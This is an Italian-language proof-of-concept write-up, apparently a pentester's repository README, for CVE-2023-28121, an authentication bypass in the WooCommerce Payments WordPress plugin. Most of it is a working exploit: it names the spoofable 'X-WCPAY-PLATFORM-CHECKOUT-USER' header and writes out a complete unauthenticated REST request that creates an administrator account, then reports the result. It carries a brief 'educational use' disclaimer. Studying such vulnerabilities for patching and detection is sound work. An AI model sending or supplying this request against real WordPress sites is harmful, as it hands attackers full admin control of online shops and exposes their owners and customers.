
Sfruttamento pratico di una vulnerabilità critica in WordPress usando il plugin WooCommerce Payments.
Esplorazione pratica di una vulnerabilità critica in WordPress utilizzando il plugin WooCommerce Payments.
La CVE-2023-28121 consente di creare utenti amministratori senza autenticazione tramite API REST.
📊 Il plugin interessato ha centinaia di migliaia di installazioni ed è ampiamente utilizzato negli e-commerce.
https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44
Il sistema accetta un header manipolabile:
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
Con questo, è possibile inviare una richiesta per la creazione di utenti con privilegi elevati senza autenticazione valida.
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
{
"username": "hacked",
"password": "StrongPass123!",
"email": "[email protected]",
"roles": ["administrator"]
}
✔️ Risultato: creazione di utente admin
/wp-admin👨💻 Autore
Luis Eduardo .M.B.S.R
Pentester / Sicurezza Web
LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/
GitHub: https://github.com/luisdevpentest
Uso educativo in ambiente controllato. Non mi assumo la responsabilità di come tale conoscenza venga utilizzata da terzi.